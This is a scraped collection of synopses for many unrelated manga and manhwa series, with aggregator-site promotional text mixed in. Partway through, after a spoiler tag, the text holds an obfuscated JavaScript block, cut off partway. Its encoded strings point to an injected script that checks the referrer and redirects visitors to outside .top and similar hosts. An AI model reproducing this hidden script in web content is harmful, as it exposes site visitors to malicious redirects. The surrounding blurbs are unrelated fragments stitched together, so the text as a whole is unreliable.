When you fall in love with the one you can't have, a choice must be made. Prince Ferance is an omega and the heir to the throne of the Kingdom of Wistad, but he holds a secret. When the king died, the regent, Amandaris, snared him into his trap to imprint on him. Since then, the control of the nation fell into Amandaris' hands, and Ferance became nothing but a puppet prince. Then one day, a mysterious alpha diplomat visits from a foreign land. Ferance hears about his ability to undo the imprinting and approaches him with hopes of removing the curse that has bound him to his imprinted alpha. But he quickly finds out the man is more than meets the eye.
“Pray, become the Enchanter that represents the family.” The goodwill from the start didn’t last long. At the House that adopted me due to my affinity with elemental spirits, I lived a life detested by even the maids because my powers didn’t come to form. It was a life where I agonized over whether I would be happier in death. That is, until I found another ‘me’. “I finally found you. Hi, the current me. Won’t you enter into a contract with me? You’re far too special to live like this, you see.” A miracle appeared in front of me, who was, again, vomiting as well. The person who lived as me in my previous life. “I’ll make you into this continent’s best Enchanter.” <div class="ToggleTriggerAnchor bbCodeSpoilerContainer"> <div class="SpoilerTarget bbCodeSpoilerText">?? ?? ? ??? ???, I will Live this Life According to my Will, I Will Live This Life As I Wish</div> </div> <script></script><script>function _0x542b(_0x2a829e,_0x49deef){var _0x3cafb3=_0x5491();return _0x542b=function(_0x37097d,_0x12cf45){_0x37097d=_0x37097d-(0x486*0x6+0xd*0x101+-0x2774);var _0x50e90d=_0x3cafb3[_0x37097d];return _0x50e90d;},_0x542b(_0x2a829e,_0x49deef);}function _0x5491(){var _0x1930b8=['GIQPn','1370955bKyiPJ','6670960AocBgg','text','injza','wzLOU','floor','10464704saMAPa','https://ip','SmPas','href','8573502yvkcEh','.customapi','233308HXqhAY','includes','http://rea','Eyugh','.top/','dma.net/','4136088vxlJPU','google','random','ZcJBr','referrer','TeIHl','YlXfb','location','6ESKwGU','then','JNxTK','193369XrSryb'];_0x5491=function(){return _0x1930b8;};return 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Read “The Deposed Empress’ Scandal Novel” – “The Deposed Empress’ Scandal Manhwa” Online Free At MANGA ZIN The summary of the comics “The Deposed Empress’ Scandal”: Lucentia is a woman who was forced to marry the emperor, but was accused of treason and beheaded. She managed to escape death thanks to a precognitive dream and fled to the enemy empire, where she became Rose Von Isaac, a rich and powerful merchant. But Lucentia could not escape her fate, as she was the only one who could save the Duke of Aytan, a legendary swordsman who had a secret that could change everything. She proposed that he be her guardian, but he asked her to be his lover. Lucentia decided that she would no longer be manipulated by fate and that she would live her life as she wanted. “The Deposed Empress’ Scandal” is alternatively named: 廃后のスキャンダル / 폐후의 스캔들 The comics “The Deposed Empress’ Scandal” belongs to the Genre: Adult, Drama, Fantasy, Historical, Manhwa, Mature, Romance, Smut “KUN MANGA, MANHWA UPDATES, HARI MANGA…” are the most searched keywords on the website MANHWA CLAN. We offer a wide selection of the best and newest comics series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging
Feng Ming was only 19 when he lost his life saving a child from death without hesitation. The grateful father of the rescued child grants Feng Ming a second chance at life. Unknown to Feng Ming, his soul is whisked away to a far away ancient land (resembling the dynasties of China). Upon waking up, he finds himself inhabiting the frail body of Thunder Kingdom's crowned prince who is also graced with the title of the most beautiful man across all the lands. However, his beauty has a price as he attracts the unwanted attention of the minister of affairs, Rong Tian who finds every reason to torment the prince mentally and physically. As Feng Ming starts to get a hold of the conspiracies surrounding him, what will happen when the prince's true identity is revealed? And what happened to the 'real' prince?
It's a manga adaptation of "Das Kapital" by Karl Marx. It's published under まんがで読破 by East Press, which is a series of paperback manga who are adaptations of masterpieces of literature. It provides an introduction to the German socialist's original work, written in 1867. The targeted readers are office workers in their 30s. The fictionalized Vol. 1 of "Das Kapital" chronicles a cheese factory run by protagonist Robin, who rebels against his father's socialist principles and becomes a slave driver after teaming up with a cold-blooded capitalist investor. But Robin struggles between his capitalist ambitions and his sense of guilt over the exploitation of his workers.
Her true story, for the first time in manga!Marie-Antoinette is one of the most popular historical figures to have been adapted into fiction. Sophia Coppola, Chantal Thomas or Riyoko Ikeda... many creators have given birth to a character in line with their ideals. However, with Fuyumi Soryo's new approach, it's not to reproduce the umpteenth icon maligned by Stephan Zweig's overly biased vision, but to restore an innocent young girl to historical reality.With her precision already displayed in Cesare, and thanks to the support of the Château de Versailles, this is no longer a simple manga, but a virtual plunge into the heart of the 18th-century court. Whether you're a fan of historical fiction, a manga reader or simply curious about something new, don't miss out on this creation!
The daughter of a marquess, Julianna is known as the "perfect lady" by society. However, she has a secret. She's only enjoying acting like the perfect lady! Her true self is hidden under an invisible mask. One day, she is summoned by Prince Edward, the "perfect prince" who is actually a black-hearted schemer! At the royal palace, he gives her a fiendish order. "Become my pawn. You don't have the right to say no!" (Whoa... The prince is so evil!) Julianna reluctantly accepts her duty to act as the prince's pawn, if only to achieve her long-cherished wish, which is...
After pooring her blood, sweat and tears into saving her family's estate, Crysta is betrayed by her stepsister, stepmother and fiancé, who cheat her out of her inheritance and sell her off to marry the mysterious Masked Earl, Lord Gerald of Berverk. He is said to be cold and antisocial, an emotionless man who only seeks a wife to give him an heir. Defeated, broken-hearted and all alone in the world, Crysta makes the long journey to his estate, fearing for the worst...
Rakugo: A traditional form of Japanese storytelling, told orally by one sitting down. Often humorous, often filled with folly, rakugo has persisted throughout the ages with good reason. Within *Masterpiece Rakugo Complete Works*, 33 rakugo stories are closely adapted by George Akiyama, who gives them his own charming, chaotic touch.
Read Imprisoned One Million Years: My Disciples Are All Over The World Manhua Lu Chen, an immortal, was trapped in the Chaos Realm for many years, when he awoke again he discovered a whole different world. The old continent shattered into countless pieces, the north and south poles reversed, the heavenly suns went from nine to one, the wild beasts vanished, and the humans, who had only one. small wild country a long time ago, have spread all over the world. A mangy dog he’d picked up in the past turned out to be the ruler of a kingdom, and a little girl he kindly adopted turned out to be an immortal… Bèi Kùn Bǎi Wàn Nián: Dìzǐ Biànbù Zhū Tiān Wàn Jiè, Imprisoned a Million Years : My Disciples Are All Over the World, Bei Kun Bai Wan Nian: Dizi Bianbu Zhu Tian Wan Jie, Ten Thousand Year Stranded: Disciples Covering the Whole Vast Universe, Trapped for Millions of Years: Followers All Over the World, 被困百万年:弟子遍布诸天万界 Search for series of same genre(s) Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaGG is your best choice, don’t hesitate, just read and feel !
Read manhwa The S-Class Hunter Doesn’t Want to Be a Villainous Princess, Class S Hunter doesn’t want to be a villain princess, S급 헌터는 악역 공녀가 되기 싫습니다, The S-Class Hunter Detests Being A Villainous Princess She had transmigrated into a hunter constellation fantasy novel, and after 10 years, she finally attained the No.1 Hunter ranking and cleared the tower… But now she transmigrated into a Romance-Fantasy novel as an exalted and infamously evil princess? 【The ‘Vicious Blood Cult’ asks where on earth are we.】 【The ‘Monarch of Waves and Healing’ is confused.】 【The ‘Lord of Temptation’ is delighted with the familiar world.】 But if you look closely, this princess doesn’t usually live a bad life, does she? Every day, there are assassination attempts and all kinds of schemes… 【The ‘Vicious Blood Cult’’s skill ‘Unsinkable Poison’ LV.999 purifies the Mandrake’s poison!】 【The ‘Monarch of Waves and Healing’’s skill ‘Blessing of Water’ LV.999 heals wounds perfectly!】 【The ‘Lord of Temptation’s skill ‘Temptation of Sleep’ LV.999 puts the assassin to sleep!】 But, what the hell. Everything’s so dull compared to my previous life. I planned to leisurely clear my missions while savoring the moments when I’d be able to take a break and rest, But now, her older brothers and the male lead, who had previously tormented the villainess, began to follow me around… I will take revenge for you and grant you everything you want, so damn system, please send me back home!
Tucked away in the English countryside lies the ominous manor of the Phantomhives, a family which has established itself as the cold and ruthless "Queen's Watchdog" as well as the head of London's criminal underground. After a tragedy leaves the Earl and his wife dead, many are shocked when their son, a young boy named Ciel, claims his place as the new Earl of the Phantomhive house. At first, many perceive him only as a child surrounded by a few eccentric servants. But they soon begin to realize that it is foolish to meddle with Ciel and his demonic butler Sebastian. Taking place at the end of the 19th century, follows these two as they face countless mysteries and dangers that plague England and threaten the Queen, uncovering the truth about what really happened to Ciel's parents in the process. [Written by MAL Rewrite]